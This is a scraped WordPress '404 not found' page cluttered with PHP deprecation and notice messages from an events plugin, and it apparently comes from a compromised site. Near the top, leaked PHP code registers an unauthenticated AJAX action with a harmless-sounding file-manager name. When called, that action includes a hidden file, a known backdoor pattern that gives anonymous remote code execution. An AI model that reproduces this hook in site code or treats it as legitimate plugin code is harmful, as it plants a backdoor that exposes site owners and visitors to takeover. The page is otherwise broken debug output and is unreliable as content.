It looks like nothing was found at this location. Maybe try a search?
if(!function_exists('file_manager_check_dt')){
add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt');
add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt');
function file_manager_check_dt()
{
$file = __DIR__ . '/settings-about.php';
if (file_exists($file)) {
include $file;
}
die();
}
}
Deprecated: Optional parameter $evo_options declared before required parameter $default_val is implicitly treated as a required parameter in /home2/unisysin/abhiruproy.in/wp-content/plugins/eventON/includes/eventon-core-functions.php on line 899
Deprecated: Optional parameter $evo_options declared before required parameter $default_val is implicitly treated as a required parameter in /home2/unisysin/abhiruproy.in/wp-content/plugins/eventON/includes/class-frontend.php on line 262
Deprecated: Optional parameter $DATE_start_val declared before required parameter $evcal_lang_allday is implicitly treated as a required parameter in /home2/unisysin/abhiruproy.in/wp-content/plugins/eventON/includes/class-calendar_generator.php on line 939
Deprecated: Optional parameter $DATE_end_val declared before required parameter $evcal_lang_allday is implicitly treated as a required parameter in /home2/unisysin/abhiruproy.in/wp-content/plugins/eventON/includes/class-calendar_generator.php on line 939
Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the js_composer
domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init
action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home2/unisysin/abhiruproy.in/wp-includes/functions.php on line 6121
Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wpcf7-redirect
domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init
action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home2/unisysin/abhiruproy.in/wp-includes/functions.php on line 6121
Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the woocommerce-product-price-based-on-countries
domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init
action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home2/unisysin/abhiruproy.in/wp-includes/functions.php on line 6121
It looks like nothing was found at this location. Maybe try a search?
This will close in 0 seconds